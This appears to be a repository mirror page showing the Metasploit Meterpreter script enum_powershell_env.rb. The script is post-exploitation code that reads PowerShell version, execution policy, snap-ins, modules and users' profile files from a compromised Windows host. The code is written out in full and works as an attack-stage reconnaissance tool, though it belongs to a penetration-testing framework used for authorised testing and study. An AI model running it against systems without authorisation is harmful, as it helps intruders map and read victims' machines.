Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

enum_powershell_env.rb 4.5KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #Meterpreter script for enumerating Microsoft Powershell settings.
  7. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
  8. @client = client
  9. @@exec_opts = Rex::Parser::Arguments.new(
  10. "-h" => [ false,"Help menu." ]
  11. )
  12. @@exec_opts.parse(args) { |opt, idx, val|
  13. case opt
  14. when "-h"
  15. print_line("enum_scripting_env -- Enumerates PowerShell and WSH Configurations")
  16. print_line("USAGE: run enum_scripting_env")
  17. print_line(@@exec_opts.usage)
  18. raise Rex::Script::Completed
  19. end
  20. }
  21. #Support Functions
  22. #-------------------------------------------------------------------------------
  23. def enum_users
  24. os = @client.sys.config.sysinfo['OS']
  25. users = []
  26. user = @client.sys.config.getuid
  27. path4users = ""
  28. sysdrv = @client.sys.config.getenv('SystemDrive')
  29. if os =~ /Windows 7|Vista|2008/
  30. path4users = sysdrv + "\\Users\\"
  31. profilepath = "\\Documents\\WindowsPowerShell\\"
  32. else
  33. path4users = sysdrv + "\\Documents and Settings\\"
  34. profilepath = "\\My Documents\\WindowsPowerShell\\"
  35. end
  36. if is_system?
  37. print_status("Running as SYSTEM extracting user list..")
  38. @client.fs.dir.foreach(path4users) do |u|
  39. userinfo = {}
  40. next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
  41. userinfo['username'] = u
  42. userinfo['userappdata'] = path4users + u + profilepath
  43. users << userinfo
  44. end
  45. else
  46. userinfo = {}
  47. uservar = @client.sys.config.getenv('USERNAME')
  48. userinfo['username'] = uservar
  49. userinfo['userappdata'] = path4users + uservar + profilepath
  50. users << userinfo
  51. end
  52. return users
  53. end
  54. #-------------------------------------------------------------------------------
  55. def enum_powershell
  56. #Check if PowerShell is Installed
  57. if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
  58. print_status("Powershell is Installed on this system.")
  59. powershell_version = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine","PowerShellVersion")
  60. print_status("Version: #{powershell_version}")
  61. #Get PowerShell Execution Policy
  62. begin
  63. powershell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","ExecutionPolicy")
  64. rescue
  65. powershell_policy = "Restricted"
  66. end
  67. print_status("Execution Policy: #{powershell_policy}")
  68. powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","Path")
  69. print_status("Path: #{powershell_path}")
  70. if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1").include?("PowerShellSnapIns")
  71. print_status("Powershell Snap-Ins:")
  72. registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns").each do |si|
  73. print_status("\tSnap-In: #{si}")
  74. registry_enumvals("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}").each do |v|
  75. print_status("\t\t#{v}: #{registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}",v)}")
  76. end
  77. end
  78. else
  79. print_status("No PowerShell Snap-Ins are installed")
  80. end
  81. if powershell_version =~ /2./
  82. print_status("Powershell Modules:")
  83. powershell_module_path = @client.sys.config.getenv('PSModulePath')
  84. @client.fs.dir.foreach(powershell_module_path) do |m|
  85. next if m =~ /^(\.|\.\.)$/
  86. print_status("\t#{m}")
  87. end
  88. end
  89. tmpout = []
  90. print_status("Checking if users have Powershell profiles")
  91. enum_users.each do |u|
  92. print_status("Checking #{u['username']}")
  93. begin
  94. @client.fs.dir.foreach(u["userappdata"]) do |p|
  95. next if p =~ /^(\.|\.\.)$/
  96. if p =~ /Microsoft.PowerShell_profile.ps1/
  97. ps_profile = session.fs.file.new("#{u["userappdata"]}Microsoft.PowerShell_profile.ps1", "rb")
  98. until ps_profile.eof?
  99. tmpout << ps_profile.read
  100. end
  101. ps_profile.close
  102. if tmpout.length == 1
  103. print_status("Profile for #{u["username"]} not empty, it contains:")
  104. tmpout.each do |l|
  105. print_status("\t#{l.strip}")
  106. end
  107. end
  108. end
  109. end
  110. rescue
  111. end
  112. end
  113. end
  114. end
  115. if client.platform == 'windows'
  116. enum_powershell
  117. else
  118. print_error("This version of Meterpreter is not supported with this Script!")
  119. raise Rex::Script::Completed
  120. end